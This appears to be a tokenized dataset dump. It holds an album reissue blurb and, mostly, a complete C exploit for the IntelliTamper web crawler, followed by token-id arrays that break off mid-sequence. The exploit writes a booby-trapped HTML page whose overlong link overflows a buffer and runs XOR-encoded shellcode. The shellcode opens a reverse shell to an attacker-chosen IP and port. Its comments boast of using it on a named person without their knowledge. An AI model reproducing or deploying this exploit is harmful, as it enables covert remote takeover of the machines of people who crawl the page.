text
stringlengths
9
498k
input_ids
sequencelengths
5
331k
attention_mask
sequencelengths
5
331k
This album is a reissue of Mocking The Philanthropist. The track "In Rapture By The Fenrir Moon" was omitted, but three tracks from the EP "A Witness To The Regicide" were added. Initially released in '01, limited to 666 handnumbered copies, but another 1000 unnumbered copies were pressed in '02.
[ 1, 910, 3769, 338, 263, 337, 15118, 310, 26297, 292, 450, 5241, 9716, 1336, 391, 29889, 450, 5702, 376, 797, 390, 2156, 545, 2648, 13, 1576, 20685, 12416, 17549, 29908, 471, 25811, 29892, 541, 2211, 16257, 515, 278, 16502, 376, 29909, 24363, 2264, 1763, 450, 13, 4597, 293, 680, 29908, 892, 2715, 29889, 13, 15514, 368, 5492, 297, 525, 29900, 29896, 29892, 9078, 304, 29871, 29953, 29953, 29953, 1361, 4537, 287, 14591, 29892, 541, 1790, 29871, 29896, 29900, 29900, 29900, 13, 348, 4537, 287, 14591, 892, 15385, 297, 525, 29900, 29906, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
/********************************************************************/ /* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */ /********************************************************************/ /* NO MORE */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */ /********************************************************************/ /* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */ /* Jef_FR pourra vous le confirmer hihi :P */ /* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */ /* ben y'a du SEH alors le premier lien qui est fait plus petit */ /* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */ /* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */ /* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */ /* j'ai remarqué que sur les deux versions une fois que ca crash */ /* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */ /* cet offset toujours le meme (~fin de notre buffer). J'ai pas */ /* regardé sur d'autres plateformes, vu que j'ai deja des ret */ /* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */ /* */ /* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */ /* opcode du genre < > " \r \n ... C'est pas sorcier a coder :) */ /********************************************************************/ /* informations: www.coromputer.net, irc undernet #coromputer */ /********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef _WIN32 #include <winsock.h> #pragma comment(lib, "ws2_32") #else #include <arpa/inet.h> #endif #define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07 * for v2.07 it isn't this size 'cause * there's a *missing* in RET_ADDR2 * so it cuts the size. */ #define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */ #define RET_POS SIZEOF-4 #define RET_ADDR 0x004368C4 #define SCOFFSET2 100 /* IntelliTamper v2.07 */ #define RET_POS2 6832 #define RET_ADDR2 0x00437224 #define u_short unsigned short #define u_char unsigned char #define HOP 0xd9 /* host opcode */ #define POP 0xda /* port opcode */ #define BEGIN "<HTML><HEAD>hi</HEAD>\r\n<BODY>\r\n" #define END "</BODY>\r\n</HTML>" int set_sc(char *host,unsigned long port, char *sc) { unsigned long ip,p; unsigned int i; ip=inet_addr(host)^0x98989898; p=htons((u_short)port); p=p<<16; p+=0x0002; p=p^0x98989898; for(i=0;i<strlen(sc);i++) { if((u_char)sc[i]==HOP&&(u_char)sc[i+1]==HOP) if((u_char)sc[i+2]==HOP&&(u_char)sc[i+3]==HOP) { memcpy(sc+i,&ip,4); ip=0; } if((u_char)sc[i]==POP&&(u_char)sc[i+1]==POP) if((u_char)sc[i+2]==POP&&(u_char)sc[i+3]==POP) { memcpy(sc+i,&p,4); p=0; } } if(ip||p) { printf("error: unable to find ip/port sequence in shellc0de\n"); return -1; } return 0; } void syntax(char *prog) { printf("syntax: %s <file> <rshell_ip> <rshell_port>\n",prog); exit(0); } void banner(void) { printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit " \ "by kralor [Crpt]\n"); printf("\t\t www.coromputer.net && undernet #coromputer\n\n"); return; } int main(int argc, char *argv[]) { char buffer[SIZEOF]; unsigned long port; FILE *file; char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */ /* classic xorer */ /* "\xcc" */ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66" "\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa" /* shellc0de */ "\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98" "\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d" "\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98" "\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf" "\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9" "\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70" "\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54" "\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8" "\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b" "\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e" "\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11" "\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc" "\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67" "\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce" "\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2" "\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67" "\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3" "\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2" "\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6" "\xc5\xc3\x5a\x9c\x98"; banner(); if(argc!=4) syntax(argv[0]); port=atoi(argv[3]); if(port<=0||port>65535) { printf("error: <port> must be between 1 and 65535\r\n"); return -1; } printf("[S] ip: %s port: %d file: %s\r\n",argv[2],port,argv[1]); printf("[C] Setting universal %-39s ...","shellcode"); if(set_sc(argv[2],port,shellc0de)) return -1; printf("DONE\r\n"); file=fopen(argv[1],"w"); if(!file) { printf("error: unable to open %s\r\n",argv[1]); return -1; } printf("[C] Writing magic link for Intellitamper %-20s ...","v2.07"); fprintf(file,BEGIN); fprintf(file,"sex drugs and rock'n'roll<BR>\r\n"); memset(buffer,0x90,sizeof(buffer)); *(unsigned long*)&buffer[RET_POS2] = RET_ADDR2; memcpy(buffer+SCOFFSET2,shellc0de,sizeof(shellc0de)-1); memcpy(buffer+6836-8,"\xEB\xE0",2); /* jmp $ - 0x10 */ memcpy(buffer+6836-16,"\xE9\x8F\xE5\xFF\xFF",5); /* jmp $ - ??? */ fprintf(file,"<A HREF=\""); fprintf(file,buffer); fprintf(file,"\">sexy bitch</A><BR>\r\n"); printf("DONE\r\n"); printf("[C] Writing magic link for Intellitamper %-20s ...","v2.08 Beta 4"); memset(buffer,0x90,sizeof(buffer)); *(unsigned long*)&buffer[RET_POS] = RET_ADDR; memcpy(buffer+SCOFFSET,shellc0de,sizeof(shellc0de)-1); memcpy(buffer+SIZEOF-8,"\xEB\xE0",2); /* jmp $ - 0x10 */ memcpy(buffer+SIZEOF-16,"\xE9\x8F\xEB\xFF\xFF",5); /* jmp $ - ??? */ fprintf(file,"<A HREF=\""); fprintf(file,buffer); fprintf(file,"\">not sexy bitch</A><BR>\r\n"); printf("DONE\r\n"); fprintf(file,END); fclose(file); printf("[C] All job done\r\n"); return 0; }
[ 1, 847, 7775, 7775, 7775, 7775, 2328, 29914, 13, 5515, 518, 20647, 415, 29962, 29871, 3159, 5481, 29911, 314, 546, 325, 29906, 29889, 29900, 29955, 29914, 29906, 29889, 29900, 29947, 350, 1187, 29871, 29946, 805, 417, 277, 491, 413, 1705, 272, 29871, 518, 20647, 415, 29962, 3776, 13, 29914, 7775, 7775, 7775, 7775, 2328, 29914, 13, 5515, 462, 632, 11698, 16999, 1525, 462, 795, 3776, 13, 5515, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 3776, 13, 5515, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 3776, 13, 5515, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 3776, 13, 5515, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 8707, 29943, 1367, 3919, 25758, 3776, 13, 29914, 7775, 7775, 7775, 7775, 2328, 29914, 13, 5515, 12027, 417, 277, 1243, 29948, 1190, 435, 1389, 29918, 15860, 263, 1487, 1663, 29884, 29892, 5777, 1766, 1173, 6079, 263, 29871, 29896, 29900, 29900, 29995, 4248, 1678, 3776, 13, 5515, 435, 1389, 29918, 15860, 1671, 336, 7890, 454, 12388, 1050, 7251, 2918, 584, 29925, 462, 3986, 3776, 13, 5515, 8407, 5246, 274, 29915, 342, 4946, 295, 22844, 29939, 1354, 425, 26744, 3667, 895, 425, 325, 29906, 29889, 29900, 29947, 3571, 29946, 3776, 13, 5515, 3856, 343, 29915, 29874, 868, 3725, 29950, 8532, 454, 7017, 619, 264, 1750, 707, 5246, 2298, 17887, 268, 3776, 13, 5515, 1671, 425, 325, 29906, 29889, 29900, 29955, 5777, 285, 1572, 2331, 3814, 357, 29892, 5777, 16933, 19445, 427, 8323, 610, 454, 3776, 13, 5515, 19607, 636, 350, 999, 712, 2970, 316, 2298, 856, 6101, 2257, 302, 29915, 342, 439, 29915, 265, 8164, 282, 29899, 29872, 29871, 3776, 13, 5515, 432, 398, 546, 1513, 7209, 16454, 263, 443, 432, 1526, 18230, 29916, 29892, 427, 22700, 424, 29871, 29900, 29916, 29900, 29900, 29943, 29896, 4198, 12696, 259, 3776, 13, 5515, 432, 29915, 1794, 1083, 279, 17851, 712, 1190, 966, 4239, 6910, 1597, 10098, 712, 5777, 8095, 1678, 3776, 13, 5515, 313, 1324, 4380, 301, 29915, 11739, 286, 2004, 1354, 454, 410, 29887, 263, 868, 3725, 29950, 14366, 18230, 29916, 772, 6693, 1224, 3776, 13, 5515, 15093, 9210, 15237, 454, 286, 2004, 313, 30022, 4951, 316, 24145, 6835, 467, 435, 29915, 1794, 2331, 268, 3776, 13, 5515, 4880, 29948, 1190, 270, 29915, 14559, 15284, 689, 267, 29892, 18679, 712, 432, 29915, 1794, 316, 1764, 553, 3240, 539, 3776, 13, 5515, 313, 29926, 1526, 18230, 29916, 29897, 1750, 325, 609, 9941, 6079, 4248, 274, 29915, 342, 5646, 966, 7446, 10376, 29892, 13389, 29889, 259, 3776, 13, 5515, 462, 462, 462, 462, 29871, 3776, 13, 5515, 349, 29889, 29903, 29901, 383, 1300, 4880, 261, 712, 26814, 5641, 921, 272, 29948, 610, 29871, 29900, 29916, 29929, 29947, 18332, 2331, 443, 4319, 259, 3776, 13, 5515, 1015, 401, 868, 16151, 529, 1405, 376, 320, 29878, 320, 29876, 2023, 315, 29915, 342, 2331, 7319, 13241, 263, 274, 6119, 4248, 268, 3776, 13, 29914, 7775, 7775, 7775, 7775, 2328, 29914, 13, 5515, 19313, 29901, 7821, 29889, 2616, 290, 649, 261, 29889, 1212, 29892, 29871, 2076, 563, 824, 300, 396, 2616, 290, 649, 261, 539, 3776, 13, 29914, 7775, 7775, 7775, 7775, 2328, 29914, 13, 13, 29937, 2856, 529, 23656, 29889, 29882, 29958, 13, 29937, 2856, 529, 4172, 1982, 29889, 29882, 29958, 13, 29937, 2856, 529, 1807, 29889, 29882, 29958, 13, 13, 29937, 361, 1753, 903, 25152, 29941, 29906, 13, 29937, 2856, 529, 5080, 21852, 29889, 29882, 29958, 13, 29937, 28436, 3440, 29898, 1982, 29892, 376, 5652, 29906, 29918, 29941, 29906, 1159, 13, 29937, 2870, 13, 29937, 2856, 529, 279, 3274, 29914, 10157, 29889, 29882, 29958, 13, 29937, 15224, 13, 13, 29937, 7922, 22717, 10721, 9800, 1678, 29896, 29946, 29946, 29946, 29947, 462, 4949, 3159, 5481, 29911, 314, 546, 325, 29906, 29889, 29900, 29947, 350, 1187, 29871, 29946, 5300, 325, 29906, 29889, 29900, 29955, 13, 462, 462, 4706, 334, 363, 325, 29906, 29889, 29900, 29955, 372, 3508, 29915, 29873, 445, 2159, 525, 29883, 1071, 13, 462, 462, 4706, 334, 727, 29915, 29879, 263, 334, 27259, 29930, 297, 28081, 29918, 3035, 8353, 29906, 13, 462, 462, 4706, 334, 577, 372, 5700, 29879, 278, 2159, 29889, 13, 462, 462, 4706, 3776, 13, 13, 29937, 7922, 317, 3217, 4198, 10490, 29871, 29896, 29900, 29900, 29900, 29900, 462, 4949, 3159, 5481, 29911, 314, 546, 325, 29906, 29889, 29900, 29947, 350, 1187, 29871, 29946, 3776, 13, 29937, 7922, 28081, 29918, 24815, 29871, 22717, 10721, 9800, 29899, 29946, 13, 29937, 7922, 28081, 29918, 3035, 8353, 29871, 29900, 29916, 29900, 29900, 29946, 29941, 29953, 29947, 29907, 29946, 13, 13, 29937, 7922, 317, 3217, 4198, 10490, 29906, 29871, 29896, 29900, 29900, 462, 29871, 4949, 3159, 5481, 29911, 314, 546, 325, 29906, 29889, 29900, 29955, 3776, 13, 29937, 7922, 28081, 29918, 24815, 29906, 259, 29953, 29947, 29941, 29906, 13, 29937, 7922, 28081, 29918, 3035, 8353, 29906, 29871, 29900, 29916, 29900, 29900, 29946, 29941, 29955, 29906, 29906, 29946, 13, 13, 29937, 7922, 318, 29918, 12759, 12780, 3273, 13, 29937, 7922, 318, 29918, 3090, 29871, 12780, 1373, 13, 29937, 7922, 379, 4590, 29871, 29900, 29916, 29881, 29929, 4949, 3495, 1015, 401, 3776, 13, 29937, 7922, 349, 4590, 29871, 29900, 29916, 1388, 4949, 2011, 1015, 401, 3776, 13, 29937, 7922, 22815, 9872, 7020, 5299, 23252, 29958, 2918, 829, 23252, 14247, 29878, 29905, 29876, 29966, 8456, 29928, 29979, 14247, 29878, 29905, 29876, 29908, 13, 29937, 7922, 11056, 259, 25225, 8456, 29928, 29979, 14247, 29878, 29905, 29876, 829, 7020, 11903, 13, 13, 524, 731, 29918, 1557, 29898, 3090, 334, 3069, 29892, 15395, 1472, 2011, 29892, 1373, 334, 1557, 29897, 13, 29912, 13, 29871, 12780, 1472, 10377, 29892, 29886, 29936, 13, 29871, 12780, 938, 474, 29936, 13, 13, 29871, 10377, 29922, 10157, 29918, 10030, 29898, 3069, 4887, 29900, 29916, 29929, 29947, 29929, 29947, 29929, 29947, 29929, 29947, 29936, 13, 29871, 282, 29922, 400, 787, 3552, 29884, 29918, 12759, 29897, 637, 416, 13, 29871, 282, 29922, 29886, 9314, 29896, 29953, 29936, 13, 29871, 282, 23661, 29900, 29916, 29900, 29900, 29900, 29906, 29936, 13, 29871, 282, 29922, 29886, 29985, 29900, 29916, 29929, 29947, 29929, 29947, 29929, 29947, 29929, 29947, 29936, 13, 13, 1454, 29898, 29875, 29922, 29900, 29936, 29875, 29966, 710, 2435, 29898, 1557, 416, 29875, 4862, 426, 13, 29871, 565, 3552, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29962, 1360, 29950, 4590, 12774, 29898, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29974, 29896, 29962, 1360, 29950, 4590, 29897, 13, 1678, 565, 3552, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29974, 29906, 29962, 1360, 29950, 4590, 12774, 29898, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29974, 29941, 29962, 1360, 29950, 4590, 29897, 426, 13, 418, 2626, 23141, 29898, 1557, 29974, 29875, 29892, 29987, 666, 29892, 29946, 416, 13, 418, 10377, 29922, 29900, 29936, 13, 418, 500, 13, 29871, 565, 3552, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29962, 1360, 29925, 4590, 12774, 29898, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29974, 29896, 29962, 1360, 29925, 4590, 29897, 13, 1678, 565, 3552, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29974, 29906, 29962, 1360, 29925, 4590, 12774, 29898, 29884, 29918, 3090, 29897, 1557, 29961, 29875, 29974, 29941, 29962, 1360, 29925, 4590, 29897, 426, 13, 418, 2626, 23141, 29898, 1557, 29974, 29875, 29892, 29987, 29886, 29892, 29946, 416, 13, 418, 282, 29922, 29900, 29936, 13, 418, 500, 13, 29871, 500, 13, 13, 361, 29898, 666, 8876, 29886, 29897, 426, 13, 29871, 7571, 703, 2704, 29901, 9368, 304, 1284, 10377, 29914, 637, 5665, 297, 6473, 29883, 29900, 311, 29905, 29876, 1496, 13, 29871, 736, 448, 29896, 29936, 13, 29871, 500, 13, 29871, 736, 29871, 29900, 29936, 13, 29913, 13, 13, 5405, 5877, 29898, 3090, 334, 29097, 29897, 13, 29912, 13, 29871, 7571, 703, 29562, 29901, 1273, 29879, 529, 1445, 29958, 529, 29878, 15903, 29918, 666, 29958, 529, 29878, 15903, 29918, 637, 14247, 29876, 613, 29097, 416, 13, 29871, 6876, 29898, 29900, 416, 13, 29913, 13, 13, 5405, 289, 7310, 29898, 5405, 29897, 13, 29912, 13, 29871, 7571, 14182, 29876, 29905, 29873, 29961, 20647, 415, 29962, 3159, 5481, 29911, 314, 546, 325, 29906, 29889, 29900, 29955, 29914, 29906, 29889, 29900, 29947, 350, 1187, 29871, 29946, 805, 417, 277, 376, 320, 13, 308, 376, 1609, 413, 1705, 272, 518, 20647, 415, 10725, 29876, 1496, 13, 29871, 7571, 14182, 29873, 29905, 29873, 29871, 7821, 29889, 2616, 290, 649, 261, 29889, 1212, 2607, 563, 824, 300, 396, 2616, 290, 649, 261, 29905, 29876, 29905, 29876, 1496, 13, 29871, 736, 29936, 13, 29913, 13, 13, 524, 1667, 29898, 524, 1852, 29883, 29892, 1373, 334, 19218, 23076, 13, 29912, 13, 29871, 1373, 6835, 29961, 14226, 9800, 1385, 13, 29871, 12780, 1472, 2011, 29936, 13, 29871, 24080, 334, 1445, 29936, 13, 29871, 1373, 6473, 29883, 29900, 311, 2636, 353, 259, 4949, 13810, 29898, 15903, 29883, 29900, 311, 29974, 29916, 9386, 29897, 1275, 29871, 29941, 29941, 29946, 6262, 3776, 13, 29871, 4949, 22037, 921, 9386, 3776, 13, 29871, 4949, 6634, 29916, 617, 29908, 3776, 13, 29871, 6634, 29916, 774, 29905, 29916, 29900, 29906, 29905, 29916, 774, 29905, 29916, 29900, 29945, 29905, 17115, 29947, 29905, 24660, 29929, 29905, 29916, 600, 29905, 29916, 600, 29905, 29916, 600, 29905, 29916, 29945, 29890, 29905, 29916, 29947, 29900, 29905, 21791, 29941, 29905, 29916, 29896, 29900, 29905, 29916, 29941, 29941, 29905, 21791, 29929, 29905, 29916, 29953, 29953, 29908, 13, 29871, 6634, 29916, 29890, 29929, 29905, 29916, 29941, 29888, 29905, 29916, 29900, 29896, 29905, 29916, 29947, 29900, 29905, 29916, 29941, 29941, 29905, 29916, 29929, 29947, 29905, 29916, 29946, 29941, 29905, 17115, 29906, 29905, 29916, 5444, 29908, 13, 29871, 4949, 6473, 29883, 29900, 311, 3776, 13, 29871, 6634, 29916, 29896, 29929, 29905, 29916, 29945, 29883, 29905, 29916, 29945, 29900, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29896, 29941, 29905, 29916, 29955, 29946, 29905, 29916, 29896, 29941, 29905, 29916, 29953, 29883, 29905, 29916, 2252, 29905, 29916, 346, 29905, 29916, 13801, 29905, 29916, 29941, 29929, 29905, 17367, 29947, 29905, 29916, 29929, 29947, 29908, 13, 29871, 6634, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29896, 29941, 29905, 29916, 29881, 29947, 29905, 29916, 29929, 29946, 29905, 29916, 29896, 29941, 29905, 17115, 29947, 29905, 29916, 29947, 29946, 29905, 29916, 29941, 29945, 29905, 29916, 29896, 29941, 29905, 24660, 29900, 29905, 29916, 29929, 29900, 29905, 29916, 29955, 29941, 29905, 29916, 29929, 29947, 29905, 29916, 29896, 29941, 29905, 29916, 29945, 29881, 29908, 13, 29871, 6634, 21791, 29953, 29905, 21791, 29945, 29905, 29916, 29896, 29896, 29905, 29916, 29929, 29872, 29905, 29916, 29953, 29955, 29905, 29916, 3660, 29905, 24660, 29900, 29905, 29916, 29896, 29953, 29905, 29916, 29881, 29953, 29905, 29916, 29929, 29953, 29905, 29916, 29955, 29946, 29905, 29916, 29955, 29900, 29905, 29916, 29941, 29945, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29908, 13, 29871, 6634, 24660, 29900, 29905, 29916, 370, 29905, 29916, 7340, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 24660, 29900, 29905, 29916, 1389, 29905, 29916, 774, 29905, 29916, 7340, 29905, 21791, 29955, 29905, 29916, 617, 29905, 29916, 29953, 29955, 29905, 29916, 29946, 29947, 29905, 29916, 29896, 29941, 29905, 29916, 29953, 29900, 29905, 29916, 6854, 29908, 13, 29871, 6634, 24660, 29900, 29905, 29916, 29946, 29896, 29905, 29916, 29929, 29896, 29905, 29916, 29953, 29881, 29905, 29916, 29941, 29945, 29905, 29916, 29955, 29900, 29905, 29916, 29900, 29890, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 370, 29905, 29916, 29945, 29896, 29905, 21791, 29929, 29905, 21791, 29929, 29905, 21791, 29929, 29905, 21791, 29929, 29908, 13, 29871, 6634, 29916, 29881, 29929, 29905, 21791, 29929, 29905, 29916, 29881, 29929, 29905, 21791, 29929, 29905, 29916, 29953, 29955, 29905, 29916, 29946, 29947, 29905, 29916, 29896, 29896, 29905, 29916, 311, 29905, 29916, 12328, 29905, 29916, 6854, 29905, 24660, 29900, 29905, 29916, 29955, 29946, 29905, 29916, 29953, 29896, 29905, 29916, 29941, 29906, 29905, 24660, 29947, 29905, 29916, 29955, 29900, 29908, 13, 29871, 6634, 17115, 29896, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 24660, 29900, 29905, 29916, 29881, 29929, 29905, 29916, 29881, 29929, 29905, 29916, 29881, 29929, 29905, 29916, 29881, 29929, 29905, 24660, 29900, 29905, 29916, 1388, 29905, 29916, 1388, 29905, 29916, 1388, 29905, 29916, 1388, 29905, 29916, 29896, 29941, 29905, 29916, 29945, 29946, 29908, 13, 29871, 6634, 24660, 29906, 29905, 29916, 29947, 29947, 29905, 21791, 29929, 29905, 29916, 29953, 29955, 29905, 29916, 3905, 29905, 29916, 12328, 29905, 29916, 29953, 29955, 29905, 29916, 29946, 29947, 29905, 24660, 29900, 29905, 29916, 14943, 29905, 24660, 29945, 29905, 29916, 13801, 29905, 29916, 29929, 29947, 29905, 29916, 29896, 29896, 29905, 29916, 1725, 29905, 17367, 29947, 29908, 13, 29871, 6634, 29916, 29953, 29955, 29905, 29916, 3660, 29905, 24660, 29900, 29905, 29916, 11248, 29905, 29916, 29953, 29953, 29905, 29916, 29906, 29890, 29905, 29916, 29947, 29872, 29905, 29916, 29955, 29900, 29905, 21791, 29929, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29896, 29896, 29905, 29916, 311, 29905, 29916, 29947, 29953, 29905, 29916, 29896, 29890, 29908, 13, 29871, 6634, 29916, 29955, 29946, 29905, 29916, 617, 29905, 29916, 29896, 29945, 29905, 17367, 29946, 29905, 29916, 12328, 29905, 29916, 370, 29905, 29916, 29945, 29947, 29905, 29916, 370, 29905, 29916, 29945, 29896, 29905, 29916, 29896, 29890, 29905, 29916, 29945, 29929, 29905, 29916, 29947, 29881, 29905, 29916, 29941, 29941, 29905, 29916, 29955, 29874, 29905, 29916, 29953, 29945, 29905, 29916, 29945, 29872, 29908, 13, 29871, 6634, 29916, 13891, 29905, 29916, 12328, 29905, 29916, 29947, 29947, 29905, 29916, 13891, 29905, 29916, 29953, 29953, 29905, 29916, 13891, 29905, 29916, 12328, 29905, 17367, 29945, 29905, 29916, 29953, 29953, 29905, 29916, 13891, 29905, 29916, 12328, 29905, 17367, 29946, 29905, 29916, 29896, 29941, 29905, 29916, 311, 29905, 29916, 12328, 29905, 29916, 29896, 29896, 29908, 13, 29871, 6634, 29916, 13891, 29905, 29916, 12328, 29905, 29916, 29881, 29900, 29905, 29916, 29896, 29896, 29905, 29916, 13891, 29905, 29916, 12328, 29905, 29916, 29881, 29946, 29905, 29916, 29896, 29896, 29905, 29916, 13891, 29905, 29916, 12328, 29905, 21791, 29947, 29905, 29916, 29896, 29945, 29905, 29916, 13891, 29905, 29916, 12328, 29905, 29916, 29947, 29947, 29905, 29916, 617, 29908, 13, 29871, 6634, 21791, 29947, 29905, 21791, 29929, 29905, 21791, 29929, 29905, 21791, 29929, 29905, 24660, 29906, 29905, 29916, 29929, 29929, 29905, 21791, 29929, 29905, 21791, 29929, 29905, 29916, 29953, 29955, 29905, 29916, 3905, 29905, 17367, 29947, 29905, 21791, 29929, 29905, 29916, 29953, 29955, 29905, 29916, 346, 29905, 29916, 29947, 29953, 29905, 29916, 29953, 29955, 29908, 13, 29871, 6634, 29916, 3660, 29905, 24660, 29900, 29905, 29916, 29955, 29955, 29905, 29916, 29945, 29953, 29905, 29916, 29955, 29947, 29905, 24660, 29947, 29905, 29916, 29955, 29900, 29905, 29916, 29929, 29874, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29929, 29947, 29905, 29916, 29953, 29955, 29905, 29916, 29946, 29947, 29905, 29916, 10702, 29905, 29916, 2252, 29905, 29916, 346, 29908, 13, 29871, 6634, 29916, 6854, 29905, 29916, 29896, 29941, 29905, 24660, 29946, 29905, 29916, 12328, 29905, 29916, 29947, 29900, 29905, 29916, 29896, 29941, 29905, 29916, 1289, 29905, 17367, 29946, 29905, 29916, 29896, 29941, 29905, 29916, 617, 29905, 29916, 29929, 29881, 29905, 17115, 29900, 29905, 29916, 29929, 29890, 29905, 29916, 29946, 29881, 29905, 29916, 29896, 29941, 29905, 29916, 29881, 29906, 29908, 13, 29871, 6634, 29916, 29947, 29900, 29905, 29916, 29896, 29941, 29905, 21791, 29906, 29905, 29916, 29890, 29947, 29905, 29916, 29929, 29890, 29905, 29916, 29946, 29945, 29905, 29916, 29955, 29890, 29905, 29916, 7340, 29905, 29916, 29881, 29896, 29905, 29916, 29896, 29941, 29905, 29916, 562, 29905, 29916, 29896, 29941, 29905, 29916, 29929, 29890, 29905, 29916, 29953, 29881, 29905, 29916, 370, 29905, 29916, 29953, 29955, 29908, 13, 29871, 6634, 29916, 29953, 29946, 29905, 29916, 370, 29905, 29916, 29945, 29947, 29905, 29916, 29941, 29946, 29905, 17367, 29906, 29905, 29916, 29945, 29883, 29905, 29916, 687, 29905, 29916, 29929, 29888, 29905, 29916, 29945, 29929, 29905, 29916, 29945, 29955, 29905, 29916, 29929, 29945, 29905, 29916, 29929, 29890, 29905, 29916, 29953, 29900, 29905, 29916, 29955, 29941, 29905, 29916, 29953, 29874, 29905, 17367, 29941, 29908, 13, 29871, 6634, 17115, 29946, 29905, 29916, 12328, 29905, 29916, 29947, 29883, 29905, 29916, 287, 29905, 29916, 29955, 29929, 29905, 29916, 29896, 29941, 29905, 21791, 29906, 29905, 29916, 12328, 29905, 29916, 29929, 29890, 29905, 29916, 29946, 29945, 29905, 29916, 1725, 29905, 29916, 29896, 29941, 29905, 29916, 29929, 29946, 29905, 29916, 29881, 29941, 29905, 29916, 29896, 